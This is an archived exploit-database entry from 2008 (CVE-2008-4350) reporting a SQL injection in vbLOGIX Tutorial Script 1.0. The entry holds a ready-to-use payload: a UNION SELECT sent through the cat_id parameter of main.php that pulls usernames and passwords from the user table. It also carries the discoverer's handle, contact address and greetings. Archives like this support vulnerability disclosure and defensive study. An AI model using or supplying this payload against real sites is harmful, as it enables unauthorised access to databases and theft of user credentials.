vbLOGIX Tutorial Script <= 1.0 cat_id SQL Injection Vulnerability

2008-09-12T00:00:00
ID EDB-ID:6446
Type exploitdb
Reporter FIREH4CK3R
Modified 2008-09-12T00:00:00

Description

vbLOGIX Tutorial Script <= 1.0 (cat_id) SQL Injection Vulnerability. CVE-2008-4350. Webapps exploit for php platform

                                        
                                            #=====================================================================================================
#vbLOGIX Tutorial Script &lt;= v1.0 (cat_id) Remote SQL Injection Exploit
#=====================================================================================================
#
#
#Venedor site : http://www.vblogix.com/
#
#Demo site: http://www.vb-demo.com/
#
#Version : v1.0
#
#=====================================================================================================
#
#DORK : no have
#
#
#Exploit :
#--------------------------------
# main.php?act=list&cat_id=-1+UNION+ALL+SELECT+concat(usrname,0x3a,psswd)+FROM+t_user/*
#
#=====================================================================================================
#Discoverd By : FIREH4CK3R
#
#Contact : firehacker_msn[at]hotmail.com
#
#Greetz To : FIREH4CK3R, Sh0rtKiller, Park, Dark, SecurityBR
#
#
#=====================================================================================================

# milw0rm.com [2008-09-12]